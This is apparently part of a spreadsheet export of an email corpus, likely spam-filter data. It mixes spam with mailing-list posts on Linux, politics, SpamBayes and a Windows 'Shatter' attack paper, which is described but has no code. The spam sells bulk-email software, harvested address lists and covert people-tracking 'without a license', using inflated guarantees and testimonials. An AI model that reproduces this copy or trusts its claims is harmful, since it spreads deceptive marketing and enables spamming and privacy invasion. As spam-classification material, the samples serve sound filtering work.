 =&gt; 10,000 EXTRA ORDERS!  How Much EXTRA PROFIT is this for You?&lt;BR&gt;
 =========================================================&lt;BR&gt;&lt;BR&gt;
 ------ ----- ---- --- -- -  -&lt;BR&gt;
 As Featured in: "The Boston Globe" (05/29/98),&lt;BR&gt;
 "The Press Democrat" (01/08/99), "Anvil Media" (01/29/98):&lt;BR&gt;
 =========================================================&lt;BR&gt;
 [NIM Corporation Presents]: THE BROADCAST EMAIL PACKAGE&lt;BR&gt;
 =========================================================&lt;BR&gt;
 REQUIREMENTS: WIN 95/98/2000/ME/NT/XP or MAC SoftWindows/VirtualPC&lt;BR&gt;&lt;BR&gt;
 &lt;U&gt;[BROADCAST EMAIL SENDER SOFTWARE] ($479.00 Retail):&lt;/U&gt;&lt;BR&gt;
     Our Broadcast Email Sender Software allows you the ability to&lt;BR&gt;
     send out Unlimited, Personalized and Targeted Broadcast Email&lt;BR&gt;
     Advertisements to OVER 500,000,000 People on the Internet at&lt;BR&gt;
     the rate of up to 1,000,000 DAILY, AUTOMATICALLY and for FREE!&lt;BR&gt;
     Have a List of Your Customer Email Addresses?  Broadcast Email&lt;BR&gt;
     Advertise to Them with our Software for FREE!&lt;BR&gt;&lt;BR&gt;
 &lt;U&gt;[TARGETED EMAIL EXTRACTOR SOFTWARE] ($299.00 Retail):&lt;/U&gt;&lt;BR&gt;
     Our Targeted Email Extractor Software will Automatically&lt;BR&gt;
     Navigate through the TOP 8 Search Engines, 50,000+ Newsgroups,&lt;BR&gt;
     Millions of Web Sites, Deja News, Etc.. and Collect MILLIONS&lt;BR&gt;
     of Targeted Email Addresses by using the keywords of your&lt;BR&gt;
     choice!  This is the ULTIMATE EXTRACTOR TOOL!&lt;BR&gt;&lt;BR&gt;
 &lt;U&gt;[15,000,000+ EMAIL ADDRESSES] ($495.00 Retail):&lt;/U&gt;&lt;BR&gt;
     MILLIONS of the NEWEST &amp; FRESHEST General Interest and&lt;BR&gt;
     Regionally Targeted Email Addresses Separated by Area Code,&lt;BR&gt;
     State, Province, and Country!  From Alabama to Wyoming,&lt;BR&gt;
     Argentina to Zimbabwe!  15,000,000+ FRESH EMAILS are YOURS!&lt;BR&gt;&lt;BR&gt;
 &lt;U&gt;[STEP BY STEP BROADCAST EMAIL PACKAGE INSTRUCTIONS]:&lt;/U&gt;&lt;BR&gt;
     You will be Guided through the Entire Process of Installing&lt;BR&gt;
     and Using our Broadcast Email Software to Send out Broadcast&lt;BR&gt;
     Email Advertisements, like this one, to MILLIONS of PEOPLE for&lt;BR&gt;
     FREE!  Even if you have NEVER used a computer before, these&lt;BR&gt;
     instructions make sending Broadcast Email as EASY AS 1-2-3!&lt;BR&gt;&lt;BR&gt;
 &lt;U&gt;[THE BROADCAST EMAIL HANDBOOK]:&lt;/U&gt;&lt;BR&gt;
     The Broadcast Email Handbook will describe to you in detail,&lt;BR&gt;
     everything you ever wanted to know about Broadcast Email!&lt;BR&gt;
     Learn how to write a SUCCESSFUL Advertisement, how to manage&lt;BR&gt;
     the HUNDREDS of NEW ORDERS you could start receiving, what&lt;BR&gt;
     sells BEST via Broadcast Email, etc...  This Handbook is a&lt;BR&gt;
     NECESSITY for ANYONE involved in Broadcast Email!&lt;BR&gt;&lt;BR&gt;
 &lt;U&gt;[UNLIMITED CUSTOMER &amp; TECHNICAL SUPPORT]:&lt;/U&gt;&lt;BR&gt;
     If you ever have ANY questions, problems or concerns with&lt;BR&gt;
     ANYTHING related to Broadcast Email, we include UNLIMITED&lt;BR&gt;
     Customer &amp; Technical Support to assist you!  Our #1 GOAL&lt;BR&gt;
     is CUSTOMER SATISFACTION!&lt;BR&gt;&lt;BR&gt;
 &lt;U&gt;[ADDITIONAL INFORMATION]:&lt;/U&gt;&lt;BR&gt;
     Our Broadcast Email Software Package contains so many&lt;BR&gt;
     features, that it would take five additional pages just to&lt;BR&gt;
     list them all!  Duplicate Removing, Automatic Personalization,&lt;BR&gt;
     and Free Upgrades are just a few of the additional bonuses&lt;BR&gt;
     included with our Broadcast Email Software Package!&lt;BR&gt;&lt;BR&gt;
 ------ ----- ---- --- -- -  -&lt;BR&gt;
 ALL TOGETHER our Broadcast Email Package contains EVERYTHING&lt;BR&gt;
 YOU WILL EVER NEED for Your Entire Broadcast Email Campaign!&lt;BR&gt;&lt;BR&gt;
 You Will Receive the ENTIRE Broadcast Email Package with&lt;BR&gt;
 EVERYTHING Listed Above ($1,250.00+ RETAIL) for ONLY $499.00 US!&lt;BR&gt;
 ========================================================&lt;BR&gt;
 BUT WAIT!!  If You Order by Tuesday, May 28th, You Will&lt;BR&gt;
 Receive the Broadcast Email Package for ONLY $295.00 US!!&lt;BR&gt;
 ========================================================&lt;BR&gt;
 Order NOW and Receive [13,000,000 BONUS EMAILS] ($899 VALUE)&lt;BR&gt;
 for FREE for a TOTAL of 28,000,000 FRESH EMAIL ADDRESSES!!&lt;BR&gt;
 ========================================================&lt;BR&gt;&lt;BR&gt;
 Regardless, if you send to 1,000 or 100,000,000 PEOPLE...&lt;BR&gt;&lt;BR&gt;
 You will NEVER encounter any additional charges ever again!&lt;BR&gt;
 Our Broadcast Email Software sends Email for a LIFETIME for FREE!&lt;BR&gt;&lt;BR&gt;
 ----- ---- --- -- -  -&lt;BR&gt;
 Since 1997, we have been the Broadcast Email Marketing Authority.&lt;BR&gt;
 Our #1 GOAL is to SEE YOU SUCCEED with Broadcast Email Advertising.&lt;BR&gt;&lt;BR&gt;
 We are so confident about our Broadcast Email Package, that we are&lt;BR&gt;
 giving you 30 DAYS to USE OUR ENTIRE PACKAGE FOR FREE!&lt;BR&gt;&lt;BR&gt;
 ==&gt; You can SEND Unlimited Broadcast Email Advertisements!&lt;BR&gt;
 ==&gt; You can EXTRACT Unlimited Targeted Email Addresses!&lt;BR&gt;
 ==&gt; You can RECEIVE Unlimited Orders!&lt;BR&gt;&lt;BR&gt;
 If you do not receive at least a 300% INCREASE in SALES or are not&lt;BR&gt;
 100% COMPLETELY SATISFIED with each and every single aspect of our&lt;BR&gt;
 Broadcast Email Package, simply return it to us within 30 DAYS for&lt;BR&gt;
 a 100% FULL REFUND, NO QUESTIONS ASKED!!&lt;BR&gt;&lt;BR&gt;
 Best of ALL, if you decide to keep our Broadcast Email Package, it&lt;BR&gt;
 can be used as a 100% TAX WRITE OFF for your Business!&lt;BR&gt;&lt;BR&gt;
 ---- --- -- - -&lt;BR&gt;
 See what users of our Broadcast Email Package have to say...&lt;BR&gt;
 =========================================================&lt;BR&gt;&lt;BR&gt;
 "Since using your program, I have made as much in two days as I&lt;BR&gt;
  had in the previous two weeks!!!!!  I have to say thank you for&lt;BR&gt;
  this program - you have turned a hobby into a serious money&lt;BR&gt;
  making concern."&lt;BR&gt;
  = W. ROGERS - Chicago, IL&lt;BR&gt;&lt;BR&gt;
 "We have used the software to send to all our members plus about&lt;BR&gt;
  100,000 off the disk you sent with the software and the response&lt;BR&gt;
  we have had is just FANTASTIC!!  Our visits and sales are nearly&lt;BR&gt;
  at an all time high!"&lt;BR&gt;
  = A. FREEMAN - England, UK&lt;BR&gt;&lt;BR&gt;
 "I have received over 1200 visitors today and that was only&lt;BR&gt;
  sending out to 10,000 email addresses!"&lt;BR&gt;
  = K. SWIFT - Gunnison, CO&lt;BR&gt;&lt;BR&gt;
 "I'm a happy customer of a few years now.  Thanks a lot....I love&lt;BR&gt;
  this program.."&lt;BR&gt;
  = S. GALLAGHER - Melville, NY&lt;BR&gt;&lt;BR&gt;
 "Thanks for your prompt filing of my order for your broadcast email&lt;BR&gt;
  software -- it took only about a day.  This is faster than ANYBODY&lt;BR&gt;
  I have ever ordered something from!  Thanks again!"&lt;BR&gt;
  = W. INGERSOLL - Scottsdale, AZ&lt;BR&gt;&lt;BR&gt;
 "I feel very good about referring the folks I have sent to you&lt;BR&gt;
  thus far and will continue to do so.  It is rare to find a company&lt;BR&gt;
  that does business this way anymore...it is greatly appreciated."&lt;BR&gt;
  = T. BLAKE - Phoenix, AZ&lt;BR&gt;&lt;BR&gt;
 "Your software is a wonderful tool! A++++"&lt;BR&gt;
  = S. NOVA - Los Angeles, CA&lt;BR&gt;&lt;BR&gt;
 "Thank you for providing such a fantastic product."&lt;BR&gt;
  = M. LOPEZ - Tucson, AZ&lt;BR&gt;&lt;BR&gt;
 "Your tech support is the best I have ever seen!"&lt;BR&gt;
  = G. GONZALEZ - Malibu, CA&lt;BR&gt;&lt;BR&gt;
 "I am truly impressed with the level of service.  I must admit I&lt;BR&gt;
  was a bit skeptical when reading your ad but you certainly deliver!"&lt;BR&gt;
  = I. BEAUDOIN - Toronto, ON&lt;BR&gt;&lt;BR&gt;
 "My first go round gave me $3000 to $4000 in business in less than&lt;BR&gt;
  one week so I must thank your company for getting me started."&lt;BR&gt;
  = A. ROBERTS - San Francisco, CA&lt;BR&gt;&lt;BR&gt;
 "We are really happy with your Email program.  It has increased&lt;BR&gt;
  our business by about 500%."&lt;BR&gt;
  = M. JONES - Vancouver, BC&lt;BR&gt;&lt;BR&gt;
 "IT REALLY WORKS!!!!!  Thank you thank you, thank you."&lt;BR&gt;
  = J. BECKLEY - Cupertino, CA&lt;BR&gt;&lt;BR&gt;
 ----- ---- --- -- -  -&lt;BR&gt;
 [SOUND TOO GOOD TO BE TRUE?]&lt;BR&gt;&lt;BR&gt;
 ** If you Broadcast Email to 500,000 Internet Users Daily...&lt;BR&gt;
 ** Do you think that maybe 1 of 5,000 may order?&lt;BR&gt;&lt;BR&gt;
 =&gt; If so... That is 100 EXTRA (COST-FREE) ORDERS EVERY DAY!!&lt;BR&gt;&lt;BR&gt;
 Remember.. You have 30 DAYS to use our Broadcast Email Package&lt;BR&gt;
 for FREE and SEE IF IT WORKS FOR YOU!&lt;BR&gt;&lt;BR&gt;
 If YOU are not 100% COMPLETELY SATISFIED, SIMPLY RETURN the&lt;BR&gt;
 Broadcast Email Package to us within 30 DAYS for a FULL REFUND!&lt;BR&gt;&lt;BR&gt;
 --- -- -  -&lt;BR&gt;
 [BROADCAST EMAIL SOFTWARE PACKAGE]: Easy Ordering Instructions&lt;BR&gt;
 =========================================================&lt;BR&gt;
 =&gt; Once your order is received we will IMMEDIATELY RUSH out the&lt;BR&gt;
 =&gt; Broadcast Email Package on CD-ROM to you via FEDEX PRIORITY&lt;BR&gt;
 =&gt; OVERNIGHT or 2-DAY PRIORITY INTERNATIONAL the SAME DAY FREE!&lt;BR&gt;&lt;BR&gt;
 ------- ------ ----- ---- --- -- -  -&lt;BR&gt;
 [TO ORDER BY PHONE]:&lt;BR&gt;
 To order our Broadcast Email Software Package by phone with&lt;BR&gt;
 a Credit Card or if you have any additional questions, please&lt;BR&gt;
 call our Sales Department in the USA at:&lt;BR&gt;&lt;BR&gt;
 =&gt; (541)665-0400&lt;BR&gt;&lt;BR&gt;
 ** YOU CAN ORDER NOW!  ALL Major Credit Cards are Accepted!&lt;BR&gt;&lt;BR&gt;
 ORDER by 3PM PST (M-TH) TODAY -&gt; Have it by 10am TOMORROW FREE!&lt;BR&gt;
 EUROPEAN &amp; FOREIGN Residents -&gt; Have it within 2 WEEKDAYS FREE!&lt;BR&gt;&lt;BR&gt;
 REMOVAL From Our Email List =&gt; CALL (206)208-4589&lt;BR&gt;&lt;BR&gt;
 ------- ------ ----- ---- --- -- -  -&lt;BR&gt;
 [TO ORDER BY FAX]:&lt;BR&gt;
 To order our Broadcast Email Software Package by fax with a Credit&lt;BR&gt;
 Card, please print out the order form at the bottom of this email&lt;BR&gt;
 and complete all necessary blanks.  Then, fax the completed order&lt;BR&gt;
 form to our Order Department in the USA at:&lt;BR&gt;&lt;BR&gt;
 =&gt; (503)213-6416&lt;BR&gt;&lt;BR&gt;
 ------- ------ ----- ---- --- -- -  -&lt;BR&gt;
 [TO ORDER BY POSTAL MAIL]:&lt;BR&gt;
 To order our Broadcast Email Software Package with a Cashiers&lt;BR&gt;
 Check, Credit Card, US Money Order, US Personal Check, or US Bank&lt;BR&gt;
 Draft by postal mail, please print out the order form at the&lt;BR&gt;
 bottom of this email and complete all necessary blanks.&lt;BR&gt;&lt;BR&gt;
 Send it along with payment of $295.00 US postmarked by Tuesday,&lt;BR&gt;
 May 28th, or $499.00 US after Tuesday, May 28th to:&lt;BR&gt;&lt;BR&gt;
 NIM Corporation&lt;BR&gt;
 1314-B Center Drive #514&lt;BR&gt;
 Medford,OR 97501&lt;BR&gt;
 United States of America&lt;BR&gt;&lt;BR&gt;
 ----- ---- --- -- -  -&lt;BR&gt;
 "OVER 20,000 BUSINESSES come on the Internet EVERY single day...&lt;BR&gt;
 If you don't send out Broadcast Email... YOUR COMPETITION WILL!"&lt;BR&gt;&lt;BR&gt;
 ------- ------ ----- ---- --- -- -  -&lt;BR&gt;
 [Broadcast Email Software Package]: ORDER FORM&lt;BR&gt;
 (c)1997-2002 NIM Corporation.  All Rights Reserved&lt;BR&gt;
 =========================================================&lt;BR&gt;&lt;BR&gt;
 Company Name: __________________________________________&lt;BR&gt;&lt;BR&gt;
 Your Name: ______________________________________________&lt;BR&gt;&lt;BR&gt;
 BILLING ADDRESS: ________________________________________&lt;BR&gt;&lt;BR&gt;
 City: ___________________ State/Province: _____________________&lt;BR&gt;&lt;BR&gt;
 Zip/Postal Code: __________ Country: __________________________&lt;BR&gt;&lt;BR&gt;
 NON POBOX SHIPPING ADDRESS: ____________________________&lt;BR&gt;&lt;BR&gt;
 City: ___________________ State/Province: _____________________&lt;BR&gt;&lt;BR&gt;
 Zip/Postal Code: __________ Country: __________________________&lt;BR&gt;&lt;BR&gt;
 Phone Number: ______________ Fax Number: ___________________&lt;BR&gt;&lt;BR&gt;
 Email Address: ____________________________________________&lt;BR&gt;&lt;BR&gt;
 ** To Purchase by Credit Card, Please Complete the Following:&lt;BR&gt;&lt;BR&gt;
 Visa [ ]  Mastercard [ ]  AmEx [ ]  Discover [ ]  Diners Club [ ]&lt;BR&gt;&lt;BR&gt;
 Name on Credit Card: _______________________________________&lt;BR&gt;&lt;BR&gt;
 CC Number: ____________________________ Exp. Date: _________&lt;BR&gt;&lt;BR&gt;
 Amount to Charge Credit Card ($295.00 or $499.00):  _______________&lt;BR&gt;&lt;BR&gt;
 Signature: ________________________________________________&lt;BR&gt;&lt;BR&gt;
 =========================================================&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Of the three lying politicians, which liar would you take?
 ----- Original Message ----- 
 From: "John Hall" &lt;johnhall@evergo.net&gt;
 To: "FoRK" &lt;fork@example.com&gt;
 Sent: Monday, September 23, 2002 2:23 PM
 Subject: RE: Goodbye Global Warming
 &gt; "I did not have sex with that woman."
 &gt; 
 &gt; &gt; -----Original Message-----
 &gt; &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt; Mr.
 &gt; &gt; FoRK
 &gt; &gt; Sent: Monday, September 23, 2002 2:12 PM
 &gt; &gt; To: FoRK
 &gt; &gt; Subject: Re: Goodbye Global Warming
 &gt; &gt; 
 &gt; &gt; 
 &gt; &gt; ----- Original Message -----
 &gt; &gt; From: "John Hall" &lt;johnhall@evergo.net&gt;
 &gt; &gt; 
 &gt; &gt; &gt; A Green once said that if the Spotted Owl hadn't existed they
 &gt; &gt; &gt; would have had to invent it.
 &gt; &gt; A Republican once said "I am not a crook".
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Is this a violation of TRADEMARK?
</t>
  </si>
  <si>
    <t xml:space="preserve">"Tony L. Svanstrom" &lt;tony@svanstrom.com&gt; writes:
 &gt; IMHO it's wrong that any company is allowed to use the name of a public
 &gt; project commercially, while others aren't; esp. when it's a name that tells
 &gt; Average Joe that that version is so much better than the free one.
 Dude, take that one up with Redhat, Suse, IBM or any of the other folks using
 the name of a public project (i.e. Linux) for a commercial product.  ;-)
 This is not only a concept with precedent it's actually quite common.
 rw2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</si>
  <si>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[ILUG] Quake 3
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hi,
 I've installed Quake 3 onto my computer and it starts to run up ok but as
 soon as the graphics start it bails out.  It complains that there is an
 error in sis_drv.o,  the line before this says that it is starting Quake in
 24 bit depth, now from http://www.winischhofer.net/linuxsis630.shtml I
 understand that the sis630 won't do 24 bit depth.  So is there a way to make
 Quake start up in 16 bit depth?  I've done some "google"ing but drawn a
 blank.....
 Thanks
 Greg
 **************************************************************************
 The information contained in this e-mail is confidential,
 may be privileged and is intended only for the use of the
 recipient named above. If you are not the intended
 recipient or a representative of the intended recipient,
 you have received this e-mail in error and must not copy,
 use or disclose the contents of this email to anybody
 else. If you have received this e-mail in error, please
 notify the sender immediately by return e-mail and
 permanently delete the copy you received. This email has
 been swept for computer viruses. However, you should
 carry out your own virus checks.
 Registered in Ireland, No. 205721. http://www.FINEOS.com
 **************************************************************************
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: !CLICK HERE! How to legally access criminal and other governmental records!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p align=3D"left"&gt;&lt;font size=3D"2"=20
 face=3D"Arial"&gt;&lt;br&gt;
   &lt;/font&gt;&lt;font size=3D"+1"color=3D"brown"  face=3D"Verdana, Arial, Helvet=
 ica, =20
 sans-serif"&gt;&lt;b&gt;&lt;u&gt;Useful for your Individual and Business investigation n=
 eeds:&lt;/u&gt;&lt;/b&gt;&lt;/font &gt;
 &lt;p align=3D"left"&gt;&lt;font size=3D"+1"&gt;GET  THE TRUTH ABOUT ANYONE AND  ANYT=
 HING=85=20
 over the internet&lt;/font&gt;
 &lt;p align=3D"left"&gt; &lt;font size=3D"2"
 face=3D"Arial"&gt;&lt;font face=3D"Arial,  Helvetica, sans-serif" =20
 size=3D"3"&gt;&lt;/font&gt;&lt;font face=3D"Verdana,  Arial, Helvetica, sans-serif"=20
 size=3D"2"&gt;&lt;a  href=3D"http://server25.web4hostplus.com/id/pages.html"&gt;&lt;b=
 &gt;Please
   click on this link for more  information.&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;b&gt;&lt;font =20
 face=3D"Arial"  size=3D"2"&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;
 &lt;b&gt;
 &lt;ul&gt;
   &lt;li&gt;&lt;font face=3D"Verdana, Arial,  Helvetica, sans-serif" =20
 size=3D"2"&gt;&lt;b&gt;Finally find,
     track and learn  anything&lt;/b&gt;&lt;/font&gt;&lt;b&gt; &lt;font  face=3D"Verdana, Arial=
 ,=20
 Helvetica,  sans-serif" size=3D"2"&gt;about
     anyone just like a professional  Private Eye, but without a license! =
 =20
 &lt;/font&gt;
     &lt;/b&gt;&lt;/li&gt;
   &lt;b&gt;
   &lt;li&gt;&lt;font face=3D"Verdana, Arial,  Helvetica, sans-serif" size=3D"2"&gt;Fi=
 nd =20
 people
     who have moved or changed their  name. Identify addresses, phone  num=
 bers,
  P.O. boxes.&lt;/font&gt; &lt;/li&gt;
   &lt;li&gt;&lt;font face=3D"Verdana, Arial,  Helvetica, sans-serif" size=3D"2"&gt; L=
 ocate =20
 relatives,
     old friends or your deadbeat spouse  you haven't seen in more than a =
 =20
 decade.&lt;/font&gt;
   &lt;/li&gt;
   &lt;li&gt;&lt;font face=3D"Verdana, Arial,  Helvetica, sans-serif" size=3D"2" &gt; =
 =20
 &lt;b&gt;Exercise
     your rights check public records and  obtain FBI,
     CIA and other government  documents. &lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
   &lt;b&gt;
   &lt;li&gt;&lt;font face=3D"Verdana, Arial,  Helvetica, sans-serif" size=3D"2"&gt; P=
 erform =20
 do-it-yourself
     background checks as often as you  like, through the, Freedom of =20
 Information
     Act. &lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face=3D"Verdana, Arial,  Helvetica, sans-serif" size=3D"2"&gt;Ch=
 eck  the=20
 licenses,
     qualifications and&lt;/font&gt; &lt;font  face=3D"Verdana, Arial, Helvetica, =20
 sans-serif" size=3D"2"&gt;disciplinary
     records of Doctors, Lawyers,  Accountants, Contractors. &lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face=3D"Verdana, Arial,  Helvetica, sans-serif" size=3D"2"&gt;De=
 tect =20
 the identity
     of birthparents&lt;/font&gt; &lt;font  face=3D"Verdana, Arial, Helvetica, =20
 sans-serif" size=3D"2"&gt;or
     children given up for adoption as well  as their current whereabouts.
 &lt;/font&gt;
   &lt;/li&gt;
   &lt;li&gt;&lt;font face=3D"Verdana, Arial,  Helvetica, sans-serif" size=3D"2"&gt;Le=
 arn =20
 about
     Previous Lawsuits, Hidden  Assets,&lt;/font&gt; &lt;font face=3D"Verdana,  Ari=
 al,=20
 Helvetica, sans-serif"  size=3D"2"&gt;Concealed
     Ownership, Tax Liens, Court  Judgments, Criminal Records, Death, =20
 Marriage, Birth, Divorse Records and  MORE...&lt;/font&gt; &lt;/li&gt;
   &lt;/b&gt;&lt;/b&gt;
 &lt;/ul&gt;
 &lt;b&gt;&lt;b&gt;
 &lt;p&gt;Everyone needs a copy of this  program. It's like having a gateway to =
 a =20
 virtual
   investigative library through your own  computer.&lt;/p&gt;
 &lt;p&gt;&lt;font size=3D"2" color=3D"red"  face=3D"Verdana, Arial, Helvetica, =20
 sans-serif"&gt;With
   the most talked about software on the  net...&lt;i&gt;Internet Detective 7.5=20
 &lt;/i&gt;you
   can verify anyone's income, assets,  education, employment history and =
 =20
 brushes
   with the law. Unearth your own family  secrets and check your credit re=
 port.
   Track someone down from a phone  number, license plate, alias or s/s =20
 number,
   and much more...&lt;/font&gt; &lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Verdana, Arial,  Helvetica, sans-serif" size=3D"2"&gt;&lt;a =20
 href=3D"http://server25.web4hostplus.com/id/pages.html"&gt;Please
   click on this link for more  information.&lt;/a&gt;&lt;/font&gt;&lt;font  face=3D"Aria=
 l"=20
 size=3D"2"&gt;&lt;br&gt;
   &lt;br&gt;
   &lt;/font&gt;&lt;font size=3D"3" face=3D"Verdana,  Arial, Helvetica, sans-serif"=
 &gt;&lt;br&gt;
   &lt;/font&gt; &lt;font size=3D"2"  face=3D"Arial"&gt;&lt;br&gt;
   &lt;br&gt;
   &lt;/font&gt;&lt;/p&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;b&gt;&lt;/b&gt;&lt;/b&gt;&lt;br&gt;
 &lt;a  href=3D"mailto:barbra7867@lycos.com?subject=3DPlease_Remove"&gt;click he=
 re&lt;/a&gt;&lt;font =20
 face=3D"Arial" size=3D"2"&gt;
 to be removed from our mailing  list.&lt;/font&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fwd: FC: Bush administration readies nationwide informant program
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Yea.. this isn't newsworthy...
 This is a forwarded message
 From: Declan McCullagh &lt;declan@well.com&gt;
 To: politech@politechbot.com
 Date: Sunday, July 14, 2002, 8:06:38 PM
 Subject: FC: Bush administration readies nationwide informant program
 ===8&lt;==============Original message text===============
 The link:
 http://www.citizencorps.gov/tips.html
 ---
 Date: Sun, 14 Jul 2002 20:59:54 +0000
 From: "J.D. Abolins" &lt;jda-ir@njcc.com&gt;
 Subject: Aussie paper: US planning to recruit one in 24 Americans as citizen
   spies
 Anybody ever heard of Pavlik Morozov? (If not see 
 http://www.cyberussr.com/rus/morozov.html for a quick blurb about the 
 fellow.) When I see proposals to mobilize American people into being eyes 
 and ears fo the government, I am reminded of Pavilik and his family.
 Now I am not against people reporting certain things to the police. It is 
 the habit of being constantly suspicious of neighbors, co-workers, and 
 otehrs that can become destructive. Down the line it can lead to suspicions 
 based not on significant clues but upon things such as "fails to display 
 sufficient respect for authority", "laughs whenever the phrase 'homeland 
 security' is used", and "hangs out with anti-social misfits." It is an all 
 too easy slide from neighbors watching out for each and helping the 
 community to becoming agents of the state.
 J.D. Abolins
 PS: Why is it that the most revealing news reports about the USA are coming 
 nowadays form the UK, Aussie, and other non-USA media? &lt;rhetorical&gt;
 --------------
  From the Sydney Morning Herald Web site 15 July 2002
 http://www.smh.com.au/articles/2002/07/14/1026185141232.html
 US planning to recruit one in 24 Americans as citizen spies
 By Ritt Goldstein
 July 15 2002
 The Bush Administration aims to recruit millions of United States citizens 
 as domestic informants in a program likely to alarm civil liberties groups.
 The Terrorism Information and Prevention System, or TIPS, means the US will 
 have a higher percentage of citizen informants than the former East Germany 
 through the infamous Stasi secret police. The program would use a minimum 
 of 4 per cent of Americans to report "suspicious activity".
 Civil liberties groups have already warned that, with the passage earlier 
 this year of the Patriot Act, there is potential for abusive, large-scale 
 investigations of US citizens.
 As with the Patriot Act, TIPS is being pursued as part of the so-called war 
 against terrorism. It is a Department of Justice project.
 Highlighting the scope of the surveillance network, TIPS volunteers are 
 being recruited primarily from among those whose work provides access to 
 homes, businesses or transport systems. Letter carriers, utility employees, 
 truck drivers and train conductors are among those named as targeted recruits.
 A pilot program, described on the government Web site www.citizencorps.gov, 
 is scheduled to start next month in 10 cities, with 1 million informants 
 participating in the first stage. Assuming the program is initiated in the 
 10 largest US cities, that will be 1 million informants for a total 
 population of almost 24 million, or one in 24 people.
 [...]
 -------------------------------------------------------------------------
 POLITECH -- Declan McCullagh's politics and technology mailing list
 You may redistribute this message freely if you include this notice.
 To subscribe to Politech: http://www.politechbot.com/info/subscribe.html
 This message is archived at http://www.politechbot.com/
 Declan McCullagh's photographs are at http://www.mccullagh.org/
 -------------------------------------------------------------------------
 Like Politech? Make a donation here: http://www.politechbot.com/donate/
 -------------------------------------------------------------------------
 ===8&lt;===========End of original message text===========
 -- 
 Best regards,
  karee                            mailto:karee@tstonramp.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">There seem to be two "drivers" for the classifier now: Neale Pickett's
 hammie.py, and the original GBayes.py.  According to the README.txt,
 GBayes.py hasn't been kept up to date.  Is there anything in there
 that isn't covered by hammie.py?  About the only useful feature of
 GBayes.py that hammie.py doesn't (yet) copy is -u, which calculates
 spamness for an entire mailbox.  This feature can easily be copied
 into hammie.py.  (GBayes.py also has a large collection of tokenizers;
 but timtoken.py rules, so I'm not sure how interesting that is now.)
 Therefore I propose to nuke GBayes.py, after adding a -u feature.
 Anyone against?  (I imagine that Skip or Barry might have a stake in
 GBayes.py; Tim seems to have moved all code he's working to other
 modules.)
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Shatter Attacks - How to break Windows
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I'm sure this is common knowledge already, but just in case ...
 http://security.tombom.co.uk/shatter.html
    This paper presents a new generation of attacks against Microsoft
    Windows, and possibly other message-based windowing systems. The
    flaws presented in this paper are, at the time of writing,
    unfixable. The only reliable solution to these attacks requires
    functionality that is not present in Windows, as well as efforts on
    the part of every single Windows software vendor. Microsoft has
    known about these flaws for some time; when I alerted them to this
    attack, their response was that they do not class it as a flaw -
    the email can be found here. This research was sparked by comments
    made by Microsoft VP Jim Allchin who stated, under oath, that there
    were flaws in Windows so great that they would threaten national
    security if the Windows source code were to be disclosed. He
    mentioned Message Queueing, and immediately regretted it. However,
    given the quantity of research currently taking place around the
    world after Mr Allchin's comments, it is about time the white hat
    community saw what is actually possible.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The best possible mortgage
</t>
  </si>
  <si>
    <t xml:space="preserve">Opportunity is knocking. Why?
 Because mortgage rates are rising.
 As a National Lender, not a broker, we can
 guarantee you the lowest possible rate on your
 home loan.
 Rates may well never be this low again. This is
 your chance to secure a better future. You could
 literally save enough money to buy that new car
 you've been wanting or to take that special
 vacation. Why pay more than you have to pay?
 We can guarantee you the best rate and the best
 deal possible for you. But only if you act now.
 This is a free service. No fees of any kind.
 You can easily determine if we can help you in
 just a few short minutes. We only provide
 information in terms so simple that anyone can
 understand them. We promise that you won't need
 an attorney to see the savings.
 We offer both first and second home loans and we
 will be happy to show you why your current loan
 is the best for you. 0r why you should replace
 it.
 Once again, there's no risk for you. None at all.
 Take two minutes and use the link(s) below that
 works for you. Let us show you how to get more
 for yourself and your family. Don't let
 opportunity pass you by. Take action now.
 &lt;a href="http://click.lycos.com/director.asp?id=1&amp;target=http://211.167.74.101/mortg/"&gt;Click_Here&lt;/a&gt;
 http://click.lycos.com/director.asp?id=1&amp;target=http://211.167.74.101/mortg/
 Sincerely,
 Chalres M. Gillette
 MortCorp, LLC
 awadfxpycporehzqimpavfkcajiucqkdwqfnustyzmfikmsyvnwgqpvvbdhccxnivoxvuasksrrcljzlkzprgcdbqjmhkqrxchgsujoxgskrnjkqkzvwpeykk
 __________________________________________________________________
 Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/
 Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">IMPORTANT NOTICE:  Regarding your domain name
 * If you own a .com/.net/.org, you are advised to register 
   your .ws "web site" domain before someone else takes it forever.
 * Major corporations such as Yahoo, ATT &amp; Intel, have all
   registered their .ws "web site" domains for their company names 
   as well as all their trademarks, to protect them forever.
 * .ws "web site" domains are in 180+ countries worldwide
